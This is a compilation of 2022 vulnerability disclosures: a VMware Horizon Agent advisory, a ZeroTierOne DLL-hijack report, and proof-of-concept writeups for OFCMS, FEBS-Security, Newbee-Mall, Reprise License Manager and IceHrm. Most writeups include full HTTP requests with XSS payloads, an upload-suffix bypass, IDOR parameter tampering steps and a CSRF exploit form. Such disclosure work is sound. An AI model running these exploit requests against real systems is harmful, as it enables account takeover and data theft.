VMware Horizon Agent for Linux (prior to 22.x) contains a local privilege escalation as a user is able to change the default shared folder location due to a vulnerable symbolic link. Successful exploitation can result in linking to a root owned file.

Advisory ID: VMSA-2022-0012.1

CVSSv3 Range: 7.3

Issue Date: 2022-04-06

Updated On: 2022-04-20

CVE(s): CVE-2022-22962, CVE-2022-22964

Synopsis: VMware Horizon Agent for Linux update addresses multiple vulnerabilities (CVE-2022-22962, CVE-2022-22964)

Share this page on social media

Sign up for Security Advisories

****1\. Impacted Products****

*   VMware Horizon Agent for Linux

****2\. Introduction****

Multiple vulnerabilities in VMware Horizon Agent for Linux were privately reported to VMware. Updates are available to remediate these vulnerabilities in affected VMware products.  

****3a. User-controlled folder path customization privilege escalation vulnerability (CVE-2022-22962)****

VMware Horizon Agent for Linux contains a local privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.3.  

A low-privileged malicious actor with local access to Horizon Agent for Linux may be able to change the default shared folder location due to a vulnerable symbolic link. Successful exploitation can result in linking to a root owned file.  

To remediate CVE-2022-22962 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

VMware would like to thank Jack Luketina for reporting this issue to us.

****3b. User configurable agent privilege escalation vulnerability (CVE-2022-22964)****

VMware Horizon Agent for Linux contains a local privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.3.  

A low-privileged malicious actor with local access to Horizon Agent for Linux may be able to escalate privileges to root due to a vulnerable configuration file.  

To remediate CVE-2022-22964 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.  

VMware would like to thank Jack Luketina for reporting this issue to us.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Horizon Agent for Linux

21.x, 20.x, 7.x

Linux

CVE-2022-22962, CVE-2022-22964

7.3

important

2203

None

None

Horizon Agent for RedHat8.x Linux

21.x, 20.x, 7.x

Linux

CVE-2022-22962, CVE-2022-22964

7.3

important

2203

None

None

Horizon Linux Agent Direct-Connection

21.x, 20.x, 7.x

Linux

CVE-2022-22962, CVE-2022-22964

7.3

important

2203

None

None

Horizon Agent

21.x, 20.x, 7.x

Windows

CVE-2022-22962, CVE-2022-22964

N/A

N/A

Unaffected

N/A

N/A

Horizon Agent Direct-Connection

21.x, 20.x, 7.x

Windows

CVE-2022-22962, CVE-2022-22964

N/A

N/A

Unaffected

N/A

N/A

****4\. References****

****5\. Change Log****

**2022-04-06 VMSA-2022-0012**  
Initial security advisory.

2022-04-20 VMSA-2022-0012.1

Corrected impacted components.

****6\. Contact****

CVE-2022-22962: VMSA-2022-0012.1

ZeroTierOne for windows local privilege escalation because of incorrect directory privilege in GitHub repository zerotier/zerotierone prior to 1.8.8. Local Privilege Escalation

**Description**

When administrators install zerotierone for windows, it will install ZeroTierOneService, the ImagePath of it is `C:\ProgramData\ZeroTier\One\zerotier-one_x64.exe`，however, the permission of `C:\ProgramData\ZeroTier\One\` is incorrect, an attacker with low privilege can get system privilege by this vuln.

**Proof of Concept**

When administrators install zerotierone for windows, it will install ZeroTierOneService, the ImagePath of it is `C:\ProgramData\ZeroTier\One\zerotier-one_x64.exe`.

![info1](https://ycdxsb-1257345996.cos.ap-beijing.myqcloud.com/blog/2022-09-04-info1.jpg)

However,the permission of `C:\ProgramData\ZeroTier\One\` is incorrect, all Users have write permission of `C:\ProgramData\ZeroTier\One` and its subdirectories.

![info2](https://ycdxsb-1257345996.cos.ap-beijing.myqcloud.com/blog/2022-09-04-info2.jpg)

When ZeroTierOneService starts, it will try to load some dlls under `C:\ProgramData\ZeroTier\One`.

![info3](https://ycdxsb-1257345996.cos.ap-beijing.myqcloud.com/blog/2022-09-04-info3.jpg)

So an attacker with low privilege can exploit it and gain a system privilege by dll hijacking because of ZeroTierOneService running as SYSTEM.

**Impact**

Local Privilege Escalation

CVE-2022-1316: ZeroTierOne for windows local privilege escalation because of incorrect directory privilege in zerotierone

A cross-site scripting (XSS) vulnerability at /ofcms/company-c-47 in OFCMS v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comment text box.

\[Suggested description\]  
Cross-site scripting vulnerability exists in the front page of OFCMS system. The user comment function in the foreground of the system does not escape the input parameters effectively. In addition, the comment function does not require login verification, which leads to a high risk of cross-site scripting vulnerability.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

GET /ofcms/api/v1/comment/save.json?comment\_content=%E6%B5%8B%E8%AF%95%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E111&content\_id=47&site\_id=1&check\_status=1&\_=1647846678826 HTTP/1.1  
Host: localhost:7000  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:7000/ofcms/company-c-47.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: JSESSIONID=2F8C11250ADB9A9DA125C3A0F9B7C8BA  
Connection: close

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability to prove\]  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173209_bea2fadd_9017458.png "屏幕截图.png")  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173224_66a3382a_9017458.png "屏幕截图.png")  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173236_85998832_9017458.png "屏幕截图.png")

CVE-2022-27961: There is a stored xss vulnerability exists in ofcms · Issue #I4Z8QU · 欧福/ofcms - Gitee.com

Insecure permissions configured in the user_id parameter at SysUserController.java of OFCMS v1.1.4 allows attackers to access and arbitrarily modify users' personal information.

\[Suggested description\]  
Information leakage vulnerability exists in the ofCMS background. As the detail method in SysUserController does not securely limit the user\_id parameter passed, any background user can view the personal information of other users by modifying the value of user\_id.

![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173625_5acb7880_9017458.png "屏幕截图.png")

\[Vulnerability Type\]  
Information disclosure

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

POST /ofcms/admin/system/user/detail.json HTTP/1.1  
Host: localhost:7000  
Content-Length: 54  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:7000  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:7000/ofcms/admin/f.html?p=system/user/edit.html&topMode=readonly&user\_id=3  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: JSESSIONID=B07DD54FA7B0F4A0B6F042CBEFD725E0  
Connection: close

p=system%2Fuser%2Fedit.html&topMode=readonly&user\_id=1

\[Attack Type\]  
Remote

\[Vulnerability to prove\]  
1.Enter the system background, open the Burpsuite agent function, click "Basic Information"  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173657_5c32e5ce_9017458.png "屏幕截图.png")

2.To obtain captured packet data，change the value of user\_id to 1.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173716_2ec15598_9017458.png "屏幕截图.png")

3.Click send data package, popup user basic information window, but the current user's input has not been transmitted.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173737_b6f3da7e_9017458.png "屏幕截图.png")

4.To obtain captured packet data, change the value of user\_id to 1.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173803_847ecc61_9017458.png "屏幕截图.png")

5.The administrator successfully obtains the account information after sending the data packet.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173832_abf99747_9017458.png "屏幕截图.png")

CVE-2022-27960: There is a Information disclosure vulnerability exists in ofcms · Issue #I4Z8SS · 欧福/ofcms - Gitee.com

Insecure permissions configured in the userid parameter at /user/getuserprofile of FEBS-Security v1.0 allows attackers to access and arbitrarily modify users' personal information.

**There is a security vulnerability exists in FEBS-Security.**

\[Suggested description\] The user / getuserprofile method in FEBS security project lacks the verification of userid, so that any user can modify the personal information of other users through the user / updateuserprofile method. via a Google search in url:http://localhost:8080/user/updateUserProfile

\[Vulnerability Type\] Insecure permissions

\[Vendor of Product\] https://github.com/febsteam/FEBS-Security

\[Affected Product Code Base\] v1.0

\[Affected Component\] //受影响的组件 POST /web\_info/save.json HTTP/1.1 Host: localhost:9105 Content-Length: 213 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" Accept: application/json, text/javascript, _/_; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost:9105 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:9105/web\_info/edit.action Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=955307B507B1FD2D9AE8E69C6EABFB75; navUrl=http://localhost:9105/admin/basic.action Connection: close

name=Javaex%E8%AE%BA%E5%9D%9B&domain=http%3A%2F%2Fwww.javaex.cn%2F&email=291026192%40qq.com&recordNumber=%E8%8B%8FICP%E5%A4%8718008530%E5%8F%B7&license=1&statisticalCode= your xss payload

\[Attack Type\] Remote

\[Proof of concept\]

1.There are security vulnerabilities in the personal information modification module of this project. It is known from the source code that the function of modifying personal information is to judge the user according to the incoming userid.

    @RequestMapping("user/getUserProfile")
    @ResponseBody
    public ResponseBo getUserProfile(Long userId) {
        try {
            MyUser user = new MyUser();
            user.setUserId(userId);
            return ResponseBo.ok(this.userService.findUserProfile(user));
        } catch (Exception e) {
            log.error("获取用户信息失败", e);
            return ResponseBo.error("获取用户信息失败，请联系网站管理员！");
        }
    }
    
    @RequestMapping("user/updateUserProfile")
    @ResponseBody
    public ResponseBo updateUserProfile(MyUser user) {
        try {
            this.userService.updateUserProfile(user);
            return ResponseBo.ok("更新个人信息成功！");
        } catch (Exception e) {
            log.error("更新用户信息失败", e);
            return ResponseBo.error("更新用户信息失败，请联系网站管理员！");
        }
    }
    

2.Use burpsuite to capture packets and modify userid

![image-20220215135415477](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135415477.png)

3.The userid of the currently logged in user is 171, and the modified userid is 172.Enter the modify personal information page.

![image-20220215135703895](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135703895.png)

4.After modifying any content, click save. Get packet capture data.

![image-20220215135841905](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135841905.png)

5.After saving successfully, exit the current login user, switch to the user with userid 172 just modified, and enter the page of viewing personal information.Vulnerability recurrence completed.

![image-20220215140035912](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215140035912.png)

CVE-2022-27958: CVE-Request/febs.md at main · afeng2016-s/CVE-Request

Newbee-Mall v1.0.0 was discovered to contain an arbitrary file upload via the Upload function at /admin/goods/edit.

\[Suggested description\]  
A file upload vulnerability exists in NewBee mall. Because the upload method of uploadcontroller can bypass the upload restriction by modifying the file format suffix.

\[Vulnerability Type\]  
File upload vulnerability

\[Vendor of Product\]  
https://github.com/newbee-ltd/newbee-mall

\[Affected Product Code Base\]  
v1.0.0

\[Affected Component\]  
POST /admin/upload/file HTTP/1.1  
Host: localhost:28089  
Content-Length: 671  
Cache-Control: max-age=0  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
sec-ch-ua-mobile: ?0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost:28089/  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoXATzrr6JWhnTx5Q  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Dest: iframe  
Referer: http://localhost:28089/admin/goods/edit/10907  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: locale=zh-cn; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=11D044F12F07C3F2772AC7EE836610E2  
Connection: close

\------WebKitFormBoundaryoXATzrr6JWhnTx5Q  
Content-Disposition: form-data; name="file"; filename="1.html.png"  
Content-Type: image/png

<script type="text/javascript" src="http://www.qq.com/404/search\_children.js" charset="utf-8" homePageUrl="{{domain}}" homePageName="{{siteName}}"></script>

            <script>alert("xss")</script>
        </div>
    </div>
    

\------WebKitFormBoundaryoXATzrr6JWhnTx5Q--

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
1.Access address http://localhost:28089/admin/goods , select a commodity information to modify and enter the file upload page.  
![image](https://user-images.githubusercontent.com/85676107/156484791-7cf3819d-08ae-4b5a-b6dd-c41ca09e25f1.png)  
2.Open burpsuite packet capturing agent and click to upload pictures.  
![image](https://user-images.githubusercontent.com/85676107/156484843-1ac1fefa-ee37-45dd-a800-bf6fd74d788d.png)  
3.By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix.  
![image](https://user-images.githubusercontent.com/85676107/156484894-ec280ca5-9f84-4499-9763-e57fb297b504.png)  
4.Modify the value of filename to 1.html  
![image](https://user-images.githubusercontent.com/85676107/156484948-9d5736a9-5132-4f65-8a7b-e6f0b281c3e3.png)  
Get the access path to file upload  
![image](https://user-images.githubusercontent.com/85676107/156484999-7ae125b6-0f2c-4a1d-bb89-a0496dc26126.png)  
Complete data update  
![image](https://user-images.githubusercontent.com/85676107/156485043-07f12491-d25b-4c33-89fd-107211a2431c.png)  
5.Access the upload file path, and the vulnerability reproduction is completed.  
![image](https://user-images.githubusercontent.com/85676107/156485114-79f128cd-a0fb-4d86-8e48-5b101d3c24b8.png)

\[Defective code\]  
![image](https://user-images.githubusercontent.com/85676107/156485179-496031ed-1ff4-4d46-bd95-c8c839fde36a.png)

CVE-2022-27477: There is a File upload vulnerability exists in newbee-mall · Issue #63 · newbee-ltd/newbee-mall

A cross-site scripting (XSS) vulnerability at /admin/goods/update in Newbee-Mall v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the goodsName parameter.

\[Suggested description\]  
There is a cross site scripting vulnerability in the commodity information modification module in the main version of NewBee mall. The vulnerability stems from the fact that the form submission module that modifies the commodity information does not restrict or escape the sensitive characters entered, causing the execution of malicious JS code to trigger JS pop-up.

\[Vulnerability Type\]  
Cross site scripting vulnerability

\[Vendor of Product\]  
https://github.com/newbee-ltd/newbee-mall

\[Affected Product Code Base\]  
v1.0.0

\[Affected Component\]

    POST /admin/goods/update HTTP/1.1
    Host: localhost:28089
    Content-Length: 392
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    Accept: */*
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: application/json
    Origin: http://localhost:28089
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:28089/admin/goods/edit/10907
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=5B28A8C926D035BCC4A809131899B51D
    Connection: close
    
    {"goodsId":"10907","goodsName":"鐖辩柉<script>alert(\"xss\")</script>","goodsIntro":"xxx","goodsCategoryId":"47","tag":"鐖辩柉","originalPrice":"1","sellingPrice":"1","stockNum":"0","goodsDetailContent":"<p>hhh</p><p><br/></p>","goodsCoverImg":"http://localhost:28089/upload/20220303_10153124.html","goodsCarousel":"http://localhost:28089/upload/20220303_10153124.html","goodsSellStatus":"0"}
    

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
1.Access address http://localhost:28089/admin/goods , select the commodity information to be modified and enter information editing.  
![image](https://user-images.githubusercontent.com/85676107/156488864-c47eee7c-1052-44a4-af50-a2febdbf9888.png)

2.Enter <script>alert(“xss”)</script> in the input box and click Save to complete the form information submission.  
![image](https://user-images.githubusercontent.com/85676107/156488901-ae7b7b65-2326-4aa5-9365-340ac7b58c20.png)

![image](https://user-images.githubusercontent.com/85676107/156488941-164b4a54-15b1-40f7-8c1b-902e0a168479.png)

3.The pop-up window is triggered when the page is refreshed, and the loophole reproduction is completed  
![image](https://user-images.githubusercontent.com/85676107/156488974-0f39a2b7-a699-4f35-a7ee-1a25e54a693d.png)

CVE-2022-27476: There is a Cross site scripting vulnerability exists in newbee-mall · Issue #64 · newbee-ltd/newbee-mall

Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture, and file/directory details.

    Multiple Vulnerabilities in Reprise License Manager 14.2Credit: Giulia Melotti Garibaldi//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28363# Vulnerability Title: Reflected Cross-Site Scripting# Severity: Medium# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.Vulnerability PoC:GET http://HOST:5054/goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedContent-Length: 38Origin: http://HOST:5054Connection: keep-aliveReferer: http://HOST:5054/goform/login_process/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28364# Vulnerability Title: Authenticated Reflected Cross-Site Scripting# Severity: Low# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required.Vulnerability PoC:GET http://HOST:5054/goform/rlmswitchr_process?file=<script>alert("1")</script> HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedOrigin: http://HOST:5054Connection: keep-aliveReferer: http://HOST:5054/goforms/rlmswitchrCookie: REDACTED/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28365# Vulnerability Title: Unauthenticated Information Disclosure# Severity: Low# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.Vulnerability PoC:GET http://HOST:5054/goforms/rlminfo HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveContent-Length: 0//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CVE-2022-28365: Reprise License Manager 14.2 Cross Site Scripting

A Cross-Site Request Forgery (CSRF) in IceHrm 31.0.0.OS allows attackers to delete arbitrary users or achieve account takeover via the app/service.php URI.

    # Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion# Date: 29/03/2022# Exploit Author: Devansh Bordia# Vendor Homepage: https://icehrm.com/# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS# Version: 31.0.0.OS#Tested on: Windows 10# CVE: CVE-2022-265881. About - ICEHRMIceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.2. Description:The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.3. Steps To Reproduce:1.) Now login into the application and go to users.2.) After this add an user with the name Devansh.3.) Now try to delete the user and intercept the request in burp suite. We can see no CSRF Token in request.4.) Go to any CSRF POC Generator: https://security.love/CSRF-PoC-Genorator/5.) Now generate a csrf poc for post based requests with necessary parameters.6.) Finally open that html poc and execute in the same browser session.7.) Now if we refresh the page, the devansh is deleted to csrf vulnerability.4. Exploit POC (Exploit.html)<html><form enctype="application/x-www-form-urlencoded" method="POST"  action="http://localhost:8070/app/service.php"><table><tr><td>t</td><td><input type="text" value="User" name="t"></td></tr><tr><td>a</td><td><input type="text" value="delete" name="a"></td></tr><tr><td>id</td><td><input type="text" value="6" name="id"></td></tr></table><input type="submit" value="http://localhost:8070/app/service.php"> </form></html>

Tag

#windows